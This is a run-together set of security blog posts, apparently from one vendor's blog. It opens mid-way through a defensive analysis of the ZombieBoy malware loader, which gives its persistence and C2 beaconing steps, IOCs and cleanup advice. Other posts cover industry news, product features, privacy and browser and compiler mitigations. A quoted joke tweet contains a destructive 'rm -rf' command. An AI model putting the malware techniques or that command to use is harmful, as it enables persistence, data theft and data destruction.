Desktop with the handle 0x8C and the flag DF_ALLOWOTHERACCOUNTS, which is set as the desktop of the calling thread. Loader.Dll then searches the system for “dazsks fsdgsdf” in SYSTEM/CurrentControlSet/Services/Dazsks Fsdgsdf, which is used to determine if this is the first time running the malware.  First Time Run: Loader.dll creates the service Dazsks Fsdgsdf with ImagePath = C:\Program Files(x86)\StormII\mssta.exe Loader.dll attempts to run the newly created service.  If the attempt is successful, continue to main loop.  If not, exit. Consequent run throughs: Start services.exe with the argument Dazsks Fsdgsdf to start the service.  Continue to main loop mentioned in First Time Run After checking for run through number, Loader.dll enters the main loop of the program.  Main loop run through: Creates an uninheritable, auto-reset, nonsignaled event named ‘ccfcdaa’ with a handle of 0x8C.  Decrypt ChDz0PYP8/oOBfMO0A/0B6Y= to ‘dns[dot]posthash[dot]org’ Start the WinSock object Create an uninheritable, unsignaled, manual-reset event object named null with the handle 0x90 Assembles Get Request: “Get /?ocid = iefvrt HTTP/1.1” Connects to dns[dot]posthash[dot]org:5200 Obtains information about the OS using GetVersionEx Load ntdll.dll and call RtlGetVersionNumbers Saves System\CurrentControlSet\Services\(null) to the registry Obtain socket name Obtain the CPU refresh speed using Hardware\Description\System\CentralProcessor\ Calls GetVersion to obtain the system info Calls GlobalMemoryStatusEx to obtain the status of the available global memory Enumerate all available disk drives starting at ‘A:/’ using GetDriveTypeA Obtain the total amount of free space available on each enumerated drive Initialize the COM library Appends the current time to the service ‘dazsks fsdgsdf’ with the marktime function Obtain the system info of a system running under WOW64 Using a list of majority chinese AV software filenames and CreateToolHelp32Snapshot, to create a snapshot of running processes and then identify any running AV programs. Decrypt EQr8/KY= to “mdzz” Sends all the data obtained above to the C2 server at dns[dot]posthash[dot]org:5200 Mitigation The best way to mitigate being hit by ZombieBoy is as always, avoidance in general, which is why I recommend updating your systems to their most recent update.  Specifically, MS17-010 will fix the malware’s spreading capabilities. If you are infected by ZombieBoy however, the first thing you should do is take a couple deep breaths.  Next, I’d recommend scanning your system with an A/V software of your choice. Once the scan has finished, you should find and end any open processes currently being run by ZombieBoy such as: 123.exe 64.exe 74.exe 84.exe CPUinfo.exe N.exe S.exe Svchost.exe (Note the file location.  End any processes not originating from C:\Windows\System32) In addition, delete the following registry keys: SYSTEM/CurrentControlSet/Services/Dazsks Fsdgsdf SYSTEM/CURRENTCONTROLSET/SERVICES/ANqiki cmsuuc Also, delete any files dropped by the malware such as: C:\%WindowsDirectory%\sys.exe C:\windows\%system%\boy.exe C:\windows\IIS\cpuinfo.exe All of the 70+ files dropped in IIS C:\Program Files(x86)\svchost.exe C:\Program Files\AppPatch\mysqld.dll C:\Program Files(x86)\StormII\mssta.exe C:\Program Files(x86)\StormII\* Indicators of Compromise Samples MD5 Size IP IOC ZombieBoy[Main Dll] 842133ddc2d57fd0f78491b7ba39a34d 82.4kb - - 123.exe 7327ef046fe62a26e5571c36b5c2c417 782.3kb Downloaded From: ca.posthash[dot]org:443 C:\%WindowsDirectory%\sys.exe [Injector123] 785a7f6e1cd40b50ad788e5d7d3c8465 437.9kb - - 64.exe 79c6ead6fa4f4addd7f2f019716dd6ca   6.4MB Mining Server: Minexmr.com   Downloaded From ca.posthash[dot]org:443/ sm.posthash[dot]org:443/ C:\windows\%system%\boy.exe C:\windows\IIS\cpuinfo.exe Necessary files for exploits and WinEggDrop into C:\windows\IIS 74.exe   38d7d4f6a712bff4ab212848802f5f9c   9.7kb C2 server: dns.posthash[dot]org:52009/ C:\Program Files(x86)\svchost.exe   SYSTEM/CURRENTCONTROLSET/SERVICES/ANqiki cmsuuc   Netsyst96.dll   6de21f2fd11d68b305b5e10d97b3f27e   1.0MB Downloaded From ca.posthash[dot]org:443/   C2 server: Dns.posthash[dot]org:52009/ C:\Program Files\AppPatch\mysqld.dll,   84.exe   91ebe2de7fcb922c794a891ff8987124 334.7kb   C2 Server: dns.posthash[dot]org:5200/   C:\Program Files(x86)\StormII\mssta.exe   SYSTEM/CurrentControlSet/Services/Dazsks Fsdgsdf   C:\Program Files(x86)\StormII\*   Loader.dll   9a46a3ae2c3762964c5cbb63b62d7dee 135.2kb C2 Server: dns.posthash[dot]org:5200/   SYSTEM/CurrentControlSet/Services/(null);   Files Queried:   Hardware\Description\System\CentralProcessor\ ;  SYSTEM/CurrentControlSet/Services/BITS;       

Javvad Malik and the rest of the AlienVault team surveyed 928 participants at Infosecurity Europe 2018 on this topic. Read the full report from Javvad here! Key Findings Looking forward, cloud security threats are the most concerning external threat Internally, phishing (55%) and ransomware (45%) lead the pack of worries for security departments 92 percent would rather pay a subscription fee, allow ads, or leave a website altogether rather than allow a website to mine cryptocurrency 56 percent believe cybersecurity has become a political pawn The report has lots of graphs with detailed results. For example, amazing how awareness of cloud security threats has become so pronounced.       

AT&T To Acquire Alienault I've covered and speculated, and even advised on security M&A over the years, but it's the first time I've been working in a technology company that has been acquired. It's exciting times, and glad to be part of the journey. AT&T to Acquire AlienVault | AlienVault In other M&A news,  Mimecast announced it acquired Ataata Inc - a cybersecurity training and awareness provider. Bomgar acquired Avecto to augments its identity and access management capabilities. and the biggie, as Broadcom agree to buy CA technologies for $19billion (yes, with a B) Cybersecurity - Why You're Doing It All Wrong A thought-provoking opinion piece by Ed Tuckeron why a lot of security controls in companies don't work. There are some broad generalisations - but it's worth it. "For too long, security teams have lived the lie that what they have delivered has been effective, but so often they approach it from a viewpoint divorced from the customers they affect. To be fair to most security teams, they are generally blissfully unaware of the inefficiencies of their controls – or ignorant." Cybersecurity - why you're doing it all wrong | Computer Weekly Timehop Shows How Incident Response Is Done On July 4th Timehop announced a breach. A breach itself isn't really big news these days - often it's just the cost of doing business online. However, the response from Timehop has been nothing short of stellar! It has published perhaps one of the most detailed updates on the incident I've ever seen - that includes internal breach notifications. They've also provided a technical timeline and even broken down the total number of records and which ones of them are under GDPR. The company may have shown us all how seriously they take security, not in the fact that they got breached, but in the manner with which they have responded.  Seriously, I think every company should look at their internal processes and ask, if they were breached today, could they produce something similar within a week?  Timehop security incident | Timehop Timehop incident technical report | Timehop Facebook Fined £500K Ffrom UK Data Watchdog These were some of the findings of the UK's Information Commissioner's Office – the nation's privacy watchdog – which this morning issued a set of reports detailing the progress made on its 18-month investigation into data analytics and political campaigning in the country. Although the headlines have focused on the fact the regulator is poised to slap a £500,000 fine on Facebook (the most it can dish out, since the Cambridge Analytica scandal happened before GDPR), there's plenty more dirt to dig. Brit privacy watchdog reports on political data harvests: We've read the lot so you don't have to | The Register Facebook faces £500,000 fine from UK data watchdog | BBC UK Implements EU Cybersecurity Rules The UK recently adopted the EU Cybersecurity Directive into UK law, called the Network and Information Systems Regulations 2018 (the NIS regime), which are now in force and can be found here. UK Implements EU Cybersecurity Rules | Cordery Compliance Physcial Attacks For Cryptocoin 23 physical attacks targeted against crypto currency owners catalogued so far. It looks like a worrying trend that is on the rise.  Known physical bitcoin attacks | GitHub Fitness App Polar Exposed Locations Of Spies And Military Personnel A popular fitness app that tracks the activity data on millions of users has inadvertently revealed the locations of personnel working at military bases and intelligence services. The app, Polar Flow, built by its eponymous company Polar, a Finnish-based fitness tracking giant with offices in New York, allowed anyone to access a user's fitness activities over several years -- simply by modifying the browser's web address. Fitness app Polar exposed locations of spies and military personnel | ZDNet After Strava, Polar is Revealing the Homes of Soldiers and Spies | Bellingcat Randomness A few other stories I enjoyed reading recently. Lessons from the maker movement | MIT Sloan  Meaningful Exits for Founders | Medium / Strong Words Life after entrepreneurship | Medium  Katie Thurmes       

Continuous security monitoring -- a term you’ve heard time and time again. And, while you may be tired of hearing the term, the fact is that continuous monitoring is vital when it comes to mitigating risk, protecting critical assets, and meeting compliance demands. Unfortunately, continuously security monitoring has become more and more of a challenge given that today’s networks no longer have a defined perimeter, but rather ever-evolving and dissolving network boundaries due to the rise of cloud and mobile computing. This growing attack surface is a cyber-criminal’s dream and a network defender’s nightmare. The bad guys only need to find one weak spot, while you’re tasked with defending against all potential weak spots. That’s definitely not a fair playing field. So where do you start? Well, to state the obvious, you can’t monitor what you can’t see, so getting visibility into who and what is connecting to your network is the first step. Automated asset discovery is one of the most essential capabilities for a continuous security monitoring program. But, it’s not just knowing which assets are running on your network, you need to know what software and services are installed on them, how they’re configured, and whether there are any vulnerabilities or active threats being executed against them. Constant application updates and changes to application and system configurations can introduce vulnerabilities and leave you susceptible to an attack, even if you are keeping your security controls up to date. This brings us to step two in continuous security monitoring -- continuous vulnerability management. Let me take this opportunity to throw in a frightening stat. According to the National Vulnerability Database (NVD), more than 14,700 vulnerabilities were reported in 2017, doubling that of 2016. Needless to say, vulnerability management is an ongoing process, and therefore by its very nature an essential part of any continuous security monitoring initiative. Continuous asset discovery and continuous vulnerability management go hand-in-hand. You can’t have one without the other when it comes to implementing a successful continuous security monitoring program. And, while you could leverage two separate tools to perform each of these tasks, why not make your life easier with a single solution that combines these capabilities? Even better, why not leverage a solution that combines all the essential capabilities for continuous security monitoring! AlienVault® Unified Security Management® (USM) gives you the upper hand in detecting and remediating the vulnerabilities in your environment before attackers exploit them. It does so by delivering automated asset discovery and vulnerability scanning as part of a unified platform that also includes intrusion detection, behavioral monitoring, SIEM event correlation, log management, and very importantly, continuously updated threat intelligence. With AlienVault USM, you get crucial real-time visibility into assets on your network, which ones are vulnerable, and where the asset is actually exposed to threats – allowing you to focus on the most important issues first. You'll be able to quickly answer critical and time-sensitive questions, such as: What devices are on my physical and virtual networks? What instances are running in my cloud environments? What vulnerabilities exist on the assets in my cloud and network? Are there known attackers trying to interact with my cloud and network assets? Are there active threats on my cloud and network assets? Conclusion Let’s face it, the bad guys aren’t going to let up when it comes to finding the holes in your security. They only need to find one weak spot to exploit, and they WILL find it if it’s there. This is why continuous security monitoring remains a must. And, this starts with knowing what assets are on your network and where you’re exposed. Let AlienVault USM help you gain the advantage over cyber-criminals.       

We’ve all seen it before; the pop ups of necessary security updates, the horror stories of leaked celebrity pictures by hackers and the infamously long document of God-knows-what followed by “I agree to the following terms and conditions”. These are ever present in our rapidly progressing technological society and continue to characterise the interaction of society with technological information, especially for the younger generation. As a high school student and member of the early half of GenZ, I wasn’t raised under the protective barrier of informational isolation formed by the limited technological advances of the generations that preceded me. My grade has had the unique ability to watch technology morph before our eyes. Elementary school was a time of computer typing class, projectors and the slow encroachment of Smart Boards as the years progressed. It seems like every year of middle school I had a different policy regarding phone usage and school districts seemed to be playing catch up to a wave of pop and technological culture flooding students. As I progressed through high school, faculty encouraged phone usage in the classroom for research and used our ability to access a mass amount of information quickly as an advantage. Every year of my education I watched the transformation of technology from flip phones and overhead projectors in elementary school to smart phones and smartboards in high school.  What my computer class in elementary school and my proceeding technology education has failed to teach me are answers to the questions “what is privacy in a world of constant connection?” and “how do we protect ourselves and stay connected?”. What is privacy in a world of constant connections? To answer this we first need to define privacy, a notoriously ambiguous object of contestation. The reason privacy is difficult to define lies in part in its subjective nature. Defining privacy relies heavily on personal preferences and values, among other individualistic factors. What is private and not private leaves the debate of cyber security in murky waters. This coupled with government, private and corporate fascination in the inner workings of individuals minds and the ever expanding ways information can be stored and shared has often left privacy as an afterthought.  A glance at the informational open philosophy of GenZ further explains the encroachment of commercial information use on the once dormant cybersphere, specifically in regard to social media. I was four years old when Facebook began and, though it took a couple years to develop into the Facebook we all know and love (or not) today, it has undeniable shaped the technological world as well as my generations perception of privacy.  “Friends” now meant the close group of people we connect to on a personal level and the dozens, hundreds, thousands of people we barely know. The contradictory dual definitions symbolize the pull of society to familiarize technological situations that had never existed before. Our generation was the guinea pig that tested the effects of being raised in a world of rapidly expanding connection and, as a result, optional privacy on the grand scale. The push to familiarize social media leads to challenges in differentiating meaningful relationships and frivolous online “relationships”. We had to learn the difference between the girl we’ve known since first grade and sunshinegirl56, especially in regards to information sharing. But in the naive minds of children, dangers can be overlooked and private information can quickly become unprivate. While we were taught to not talk to strangers online, the familiarity of the option to talk to strangers online and the prevalence of it often left the dangers of a lack of privacy dulled. This has created a generation that is numb to the importance of privacy beyond the now obvious dangers of telling a stranger personal information. We learned to ignore the slightly icky feeling that comes from ads marketing products you just searched for. We rapidly scroll through the terms and conditions pages and quickly tap the agree button, always with annoyance that it took thirty seconds out of our day. We conditioned ourselves to see privacy as a minute detail in a much larger game of connection, a necessary sacrifice. Many members of the younger generations don’t simply think that privacy isn’t really important, we never understood or really experienced full privacy in the first place. Growing up with technology has been beneficial in its ability to connect us and provide vast amount of information quickly, but has possibly permanently impaired our ability to differentiate what should be private, leaving us mindlessly tapping the “agree” buttons without considering the implications. If I brought this idea of deteriorating privacy to any number of generation Z members, I would likely be met with “so what?”, “why should I care?”. And to a generation that never saw the importance of cyber privacy it can be difficult to envision the implications. The risks of shrinking privacy lies in the ability of trusted facilities to become compromised and the formation of cyber echo chambers formulated by reciprocating information someone “likes” or posts about. With the ever imminent hackers, information has become an economic resource. It is traded, bought, held for ransom and exposed to fuel a new niche of the economy. This is only possible because of our society’s often baseless trust in the security of information holding centers, tendency to take no precautions in cyber security and the evolution of hackers from small operations to ones much larger and far more complex. These factors are not stagnant, they are evolving and expanding into the unknown. One of the most dynamic dangers of dwindling privacy is the uncertainty of the ramifications. These experimental situations are occuring at faster rates than we can acknowledge their significance, leaving us to play catch up. Conclusion So when the question “so what?” arises, I’ll say that we are shaping an online society that is a formulation of a multitude of echo chambers, increasingly prone to information breaches ranging from credit cards to personal pictures and showing no signs of slowing down. I’ll say we are essentially clicking the agree button before reading the terms and conditions of  an entire online network.          

Every so often, a report gets presented which looks like it was written by the work experience student that was employed by the intern. So what’s the best way to respond? I went on Twitter to ask the opinion of folk who have to deal with this kind of thing on a regular basis, and distilled their wisdom into 15 tips. Other honourable mentions go to: @J4vv4D in that case, this is the only response...https://t.co/AseiwFjZbt — Mo Amin (@infosecmo) December 6, 2016 @J4vv4D At 1mn05 into this video: https://t.co/GxlOaoxoZu — Luushanah (@luushanah) December 6, 2016 @J4vv4D Cannot accept this finding. Please provide more information and evidence. If they explain it better, yay, if they can't we're done — B Miller (@Securithid) December 6, 2016 @J4vv4D ask "what's the risk" — EoinKeary (@EoinKeary) December 6, 2016 @J4vv4D dear auditor this is my implementation plan: # rm -rf /audit , hope you understand my point — Juanes (@hcjuan04) December 6, 2016 @J4vv4D how about sending them this video https://t.co/8YSFKPCjoh — BrianHonan (@BrianHonan) December 6, 2016       

Here's an idea. Have convicts in prison manually mine cryptocurrencies. Call it, <wait for it> the blockchain gang! Thank you very much, I'll be here all week. Now on to the serious stuff. 10 THINGS TO KNOW BEFORE GETTING INTO CYBERSECURITY You may know Kevin Beaumont as @GossiTheDog on twitter. He won the 2018 EU blogger awards for best tweeter. But apparently, he's a man of more talents than just twits, he also blogs, and has put together a good list of 10 things you should know if you're considering getting into cybersecurity.    10 things to know before getting into cyber security| Double Pulsar Related, if you're looking to break into security, then you'll want to know which locations offer the best salaries (US-based). Cybersecurity spotlight 2018: Where are the highest paying jobs? | Indeed Blog HACKERS WILL GET HACKED Of course we trust the Government to maintain backdoors and hacking tools... they're the Government. I, for one, am shocked that gambling takes place in this casino. From Cellebrite, to Shadow Brokers, to the CIA dump, so many recent data breaches have shown there is a real risk of exposure to government hacking tools. Your Government's Hacking Tools Are Not Safe | Motherboard In related news, NSO sells its potent iPhone malware to governments, including Mexico and the United Arabs Emirates. But according to a newly released indictment, a disgruntled employee stole the company's code and tried to sell it for $50 million worth of cryptocurrency. NSO Group Employee Allegedly Stole Company’s Powerful Spyware for Personal Profit | Motherboard IT IS COMING HOME While the tide of outsourcing seems to be on the rise, does BP represent an undercurrent of some companies wanting to get their arms around exactly what they have, why they have it, and who manages it? BP is looking to bring the majority of its IT back in-house as part of a wider modernisation programme across the entire energy group, which comprises of a massive 74,000 employees. Speaking at the London leg of AppDynamic’s World Tour, Andy Sturrock, head of modernise IT transformation at BP, admitted that the energy company had been too reliant on outsourcing in the past. “We looked at ourselves and realised that we had become an IT organisation which didn’t really do IT, we facilitated other companies doing IT to us," he said. "So we wanted to get back to us being an IT organisation and developing our own capability again." BP removes reliance on third-party providers by bringing IT in-house | Channel Asia  DECENTRALISING THE INTERNET No, this isn't a story plot out of the show Silicon Valley - Fixing the internet can look like mission impossible, even in the West. A Jeffersonian reform in the form of Web 3.0 appears a long way off, and its regulatory equivalent, a vigorous antitrust policy, does not look much more promising. Online, humanity seems bound to sink ever deeper into a Hamiltonian hole. But such an outcome is not inevitable. There is no single solution to making the internet more decentralised | The Economist BYPASSING WEB-APPLICATION FIREWALLS BY ABUSING SSL/TLS A nice write up - I enjoy and am appreciative of when people take the time to go through how they do what they do. "I was given access to the WAF for different tests and apart from other methods I found to bypass it, an interesting one was by abusing SSL Ciphers. The first time I logged in the WAF the Unsupported SSL Ciphers alert caught my eye really quick. Once I saw the alert description I started digging more in the documentation of the product and managed to find all the supported SSL ciphers." Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL POLISH CHARITY GETS HUGE PHONE BILL THANKS TO STORK From the category of, "My threat model is not your threat model" we have this story whereby a Polish charity will have to pay 2,700 Polish zloty because someone stole the tracker from a stork it was tracking, and used the SIM card to rack up hours of phone calls. According to official broadcaster Radio Poland, the environmental EcoLogic Group placed a tracker on the back of a white stork last year to track the bird's migratory habits. It travelled some 3,700 miles (6,000kms), and was traced to the Blue Nile Valley in eastern Sudan before the charity lost contact. EcoLogic told the Super Express newspaper that somebody found the tracker in Sudan, removed the sim card and put it in their own phone, where they then racked up 20 hours' worth of phone calls. Polish charity gets huge phone bill thanks to stork | BBC HOW A DORM ROOM MINECRAFT SCAM BROUGHT DOWN THE INTERNET THE MOST DRAMATIC cybersecurity story of 2016 came to a quiet conclusion Friday in an Anchorage courtroom, as three young American computer savants pleaded guilty to masterminding an unprecedented botnet—powered by unsecured internet-of-things devices like security cameras and wireless routers—that unleashed sweeping attacks on key internet services around the globe last fall. What drove them wasn’t anarchist politics or shadowy ties to a nation-state. It was Minecraft. How a dorm room Minecraft scam brought down the internet | Wired RANDOMNESS A few other stories I enjoyed reading recently. Facebook patent would turn your mic on to analyze how you watch ads | Are technica Marketing firm Exactis leaked a personal info database with 340m records | Wired First-Ever Person Sentenced for Malicious Use of Coinhive Library | Bleeping Computer Gentoo hack caused by three rookie mistakes | The Register       

USM Anywhere delivers a comprehensive library of predefined compliance report templates for PCI DSS, HIPAA, NIST CSF, and ISO 27001, so you can accelerate your security and compliance programs and be audit-ready faster. It also includes 50+ predefined event reports by data source and data source type, helping to make your daily monitoring and reporting activities more eficient. In addition to predefined reports, USM Anywhere gives you powerful security investigation capabilities at your finger tips. Its intuitive and flexible interface allows you to quickly search and analyze your security data, plus you can create and save custom views and export them as executive-ready reports. Because USM Anywhere gives you centralized visibility of all your cloud and on-premises assets, vulnerabilities, threats, and log data from your firewalls and other security tools, you have the most complete and contextual data set at your disposal. This blog describes the predefined compliance reports available in USM Anywhere. It also describes search and analytics capabilities in USM Anywhere that empower you to quickly produce your own custom reports. Predefined Compliance Reports To meet regulatory compliance requirements like PCI DSS and HIPAA and to ensure that you continuously meet those requirements, you must demonstrate that you regularly monitor your environments. This demands rigorous reporting to gain insight into your assets, vulnerabilities, and potential threats, which can be extremely time-consuming if executed manually. USM Anywhere delivers the following set of predefined compliance reports that map directly to common regulatory compliance requirements and frameworks, so you can quickly and easily provide evidence of compliance during your next audit. In addition, you can easily customize any of the predefined compliance reports in USM Anywhere, adding dynamic graphs and charts to create a professional, executive-ready report. PCI DSS Reporting In USM Anywhere, once you define the PCI Asset Group—the servers, applications, and storage entities across your environment that are considered in-scope of a PCI DSS card-holder data environment (CDE)—then, you can readily view, export, and customize the following predefined reports. HIPAA - Healthcare Compliance Reporting For healthcare providers, HIPAA is a key concern. In USM Anywhere, once you define your HIPAA Asset Group—the part of your environment that touches protected health information (PHI) data—then you can readily view, export, and customize the following predefined reports.  NIST Cybersecurity Framework (CSF) Compliance Reporting USM Anywhere allows you to quickly and easily report the status of controls across the NIST CSF functions of Identify, Protect, Detect, and Respond. The following predefined NIST CSF are available out of the box with USM Anywhere. ISO 27001 Compliance Reporting Out of the box, USM Anywhere includes pre-built compliance reporting templates that map to multiple ISO 27001 requirements, making it fast and simple to review the state of your deployed technical controls and help satisfy requests during an audit. You can easily customize, save, and export any report as needed. The ISO 27001 reporting templates in USM Anywhere can also serve as general guidelines as you prepare to satisfy the requirements of industry standards and regulations like the European Union’s GDPR, or in gaining ISO 27001 certification. Because ISO 27001 serves as a globally accepted framework for information security management, it can be helpful in demonstrating how you manage your cyber security and compliance program. Predefined Event Reports To give you insights into key events by different data source types or by specific solutions, USM Anywhere delivers the following predefined event reports out of the box. Custom Reports With USM Anywhere, you can easily create custom reports as you need. USM Anywhere’s powerful log management capabilities give you a highly efficient way to search, filter, and analyze your security-related data. From either the Events or Alarms views, you can alter the view by any data field or time frame or by entering your own search phrase. Because USM Anywhere stores your recent log and event data within its Elasticsearch hot storage, you can be assured that your search results generate extraordinarily fast. In your filtered (or “custom”) data view, you can drill down to view the details of any event or alarm to investigate it. You can select the data fields you want to display, and adjust the order in which they appear in the custom list view. And, you can sort the list based on key data fields, such as time created. When you finish building the custom view that best suits your needs, you can click to save the custom data view for quick and continued access. For example, you may wish to save a custom data view that shows all login activities of a flagged suspicious user, so that you can review it daily. You also have the option to export any predefined or custom data view in an HTML or CSV format, with options to define the report name and description, date range, number of records, and more. You can select from several rich predefined graphs to add visual elements to your data - perfect for analyzing trends or presenting an executive-level summary. Explore USM Anywhere to Discover How Simple Reporting Can Be!       

Benedict Evans stated that, the best is often the last. He elaborates by saying, "The development of technologies tends to follow an S-Curve: they improve slowly, then quickly, and then slowly again. And at that last stage, they're really, really good. Everything has been optimised and worked out and understood, and they're fast, cheap and reliable." And while his original post was two years ago, which in technology terms can be a lifetime, it holds true today. It's worth taking a look at IT security under the same lens. Cynical commentators may state that IT security has never been good - but that isn't true in all cases. In fact, many traditional technologies have been so good and commoditised, that they have become all but invisible to the end user. But, perhaps what is changing more than the security technologies themselves, is the delivery mechanism. As companies have embraced the cloud, so have many providers, and security is no different. That's not to say that security appliances don't have their place in enterprises, it's just that they've probably gotten as good as they can get, so it's time to adapt to the new reality. Innovation or following the trend? Willie Sutton famously said that he robbed banks because that's where the money is. Or, as Walter Gretzky famously said, "I don't go to where the ball is, but where it is going to be." So are security providers moving to deliver security from the cloud because that's where everyone appears to be heading. However, there are benefits to both consumers and providers of cloud-based security technology. Benefits to companies As companies continue to embrace cloud technologies, it makes sense to have cloud-based security that can provide capabilities across both cloud and on premise technologies. Some of the prominent benefits include: 1. Cost to deploy With cloud-based offerings, there is no capital expenditure outlay. Users can simply select the type of license, and only pay for what they need. Saving time and resources needed to deploy the offering. 2. Continuous updates and patches One of the biggest advantages of cloud-based security software is the fact that it is continuously updated and patched by the provider. Relieving the burden of maintenance from the user and allowing them to focus on the business issues that matter the most. 3. Integration and scalability Cloud services, by their very nature are designed to be scalable, so it can keep up with the flexible demands of a business as need be. It also provides a stable platform through which integrations with other cloud-based providers can be attained, allowing users to derive increased value from their purchases. Benefits to providers But the benefits to of cloud-based security doesn't end with the customers - rather, there are many benefits to the provider too. 1. Income predictability and stability With a subscription model, it becomes easier for companies to more accurately predict income. The economies of scale also work better as fixed costs to deploy from the cloud typically rise a lot slower the more customers are acquired. 2. Expansion Cloud-based companies find it easier to expand into new territories. Without having to ship appliances, the business model becomes scalable far beyond what an appliance-based business could achieve. 3. Service delivery automation With a cloud-based model, providers can leverage service delivery automation to provision new customers, provide assistance, or answer other routine queries, allowing resources to focus on solving more pressing issues. Off to the cloud we go According to Gartner, cloud-based security services are to grow by 21 percent in 2017, and is estimated to be worth $9bn by 2020.  While there will be some industries or segments for whom, cloud-based security isn't on the radar, at least not public-cloud. The reality for the majority of companies, particularly rapidly growing ones, cloud-based security is the only route that makes business and technical sense. Maybe appliances did get as good as they were going to, and cloud-based security is the future that is here to stay.       

Posted by Charlie Reis, Site IsolatorSpeculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we're excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS. Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.This launch is one phase of our overall Site Isolation project. Stay tuned for additional security updates that will mitigate attacks beyond Spectre (e.g., attacks from fully compromised renderer processes).What is Spectre?In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. These attacks use the speculative execution features of most CPUs to access parts of memory that should be off-limits to a piece of code, and then use timing attacks to discover the values stored in that memory. Effectively, this means that untrustworthy code may be able to read any memory in its process's address space.This is particularly relevant for web browsers, since browsers run potentially malicious JavaScript code from multiple websites, often in the same process. In theory, a website could use such an attack to steal information from other websites, violating the Same Origin Policy. All major browsers have already deployed some mitigations for Spectre, including reducing timer granularity and changing their JavaScript compilers to make the attacks less likely to succeed. However, we believe the most effective mitigation is offered by approaches like Site Isolation, which try to avoid having data worth stealing in the same process, even if a Spectre attack occurs.What is Site Isolation?Site Isolation is a large change to Chrome's architecture that limits each renderer process to documents from a single site. As a result, Chrome can rely on the operating system to prevent attacks between processes, and thus, between sites. Note that Chrome uses a specific definition of "site" that includes just the scheme and registered domain. Thus, https://google.co.uk would be a site, and subdomains like https://maps.google.co.uk would stay in the same process.Chrome has always had a multi-process architecture where different tabs could use different renderer processes. A given tab could even switch processes when navigating to a new site in some cases. However, it was still possible for an attacker's page to share a process with a victim's page. For example, cross-site iframes and cross-site pop-ups typically stayed in the same process as the page that created them. This would allow a successful Spectre attack to read data (e.g., cookies, passwords, etc.) belonging to other frames or pop-ups in its process.When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using "out-of-process iframes." Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre. The first uses of out-of-process iframes shipped last year to improve the Chrome extension security model.A single page may now be split across multiple renderer processes using out-of-process iframes.Even when each renderer process is limited to documents from a single site, there is still a risk that an attacker's page could access and leak information from cross-site URLs by requesting them as subresources, such as images or scripts. Web browsers generally allow pages to embed images and scripts from any site. However, a page could try to request an HTML or JSON URL with sensitive data as if it were an image or script. This would normally fail to render and not expose the data to the page, but that data would still end up inside the renderer process where a Spectre attack might access it. To mitigate this, Site Isolation includes a feature called Cross-Origin Read Blocking (CORB), which is now part of the Fetch spec. CORB tries to transparently block cross-site HTML, XML, and JSON responses from the renderer process, with almost no impact to compatibility. To get the most protection from Site Isolation and CORB, web developers should check that their resources are served with the right MIME type and with the nosniff response header.Site Isolation is a significant change to Chrome's behavior under the hood, but it generally shouldn't cause visible changes for most users or web developers (beyond a few known issues). It simply offers more protection between websites behind the scenes. Site Isolation does cause Chrome to create more renderer processes, which comes with performance tradeoffs: on the plus side, each renderer process is smaller, shorter-lived, and has less contention internally, but there is about a 10-13% total memory overhead in real workloads due to the larger number of processes. Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure.How does Site Isolation help?In Chrome 67, Site Isolation has been enabled for 99% of users on Windows, Mac, Linux, and Chrome OS. (Given the large scope of this change, we are keeping a 1% holdback for now to monitor and improve performance.) This means that even if a Spectre attack were to occur in a malicious web page, data from other websites would generally not be loaded into the same process, and so there would be much less data available to the attacker. This significantly reduces the threat posed by Spectre.Because of this, we are planning to re-enable precise timers and features like SharedArrayBuffer (which can be used as a precise timer) for desktop.What additional work is in progress?We're now investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android, and it can be enabled manually on Android using chrome://flags/#enable-site-per-process.We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes. These additional enforcements will let us reach the original motivating goals for Site Isolation, where Chrome can effectively treat the entire renderer process as untrusted. Stay tuned for an update about these enforcements! Finally, other major browser vendors are finding related ways to defend against Spectre by better isolating sites. We are collaborating with them and are happy to see the progress across the web ecosystem.Help improve Site Isolation!We offer cash rewards to researchers who submit security bugs through the Chrome Vulnerability Reward Program. For a limited time, security bugs affecting Site Isolation may be eligible for higher rewards levels, up to twice the usual amount for information disclosure bugs. Find out more about Chrome New Feature Special Rewards.

Posted by Ivan Lozano, Information Security Engineer [Cross-posted from the Android Developers Blog]Android's switch to LLVM/Clang as the default platform compiler in Android 7.0 opened up more possibilities for improving our defense-in-depth security posture. In the past couple of releases, we've rolled out additional compiler-based mitigations to make bugs harder to exploit and prevent certain types of bugs from becoming vulnerabilities. In Android P, we're expanding our existing compiler mitigations, which instrument runtime operations to fail safely when undefined behavior occurs. This post describes the new build system support for Control Flow Integrity and Integer Overflow Sanitization. Control Flow IntegrityA key step in modern exploit chains is for an attacker to gain control of a program's control flow by corrupting function pointers or return addresses. This opens the door to code-reuse attacks where an attacker executes arbitrary portions of existing program code to achieve their goals, such as counterfeit-object-oriented and return-oriented programming. Control Flow Integrity (CFI) describes a set of mitigation technologies that confine a program's control flow to a call graph of valid targets determined at compile-time. While we first supported LLVM's CFI implementation in select components in Android O, we're greatly expanding that support in P. This implementation focuses on preventing control flow manipulation via indirect branches, such as function pointers and virtual functions—the 'forward-edges' of a call graph. Valid branch targets are defined as function entry points for functions with the expected function signature, which drastically reduces the set of allowable destinations an attacker can call. Indirect branches are instrumented to detect runtime violations of the statically determined set of allowable targets. If a violation is detected because a branch points to an unexpected target, then the process safely aborts. Figure 1. Assembly-level comparison of a virtual function call with and without CFI enabled. For example, Figure 1 illustrates how a function that takes an object and calls a virtual function gets translated into assembly with and without CFI. For simplicity, this was compiled with -O0 to prevent compiler optimization. Without CFI enabled, it 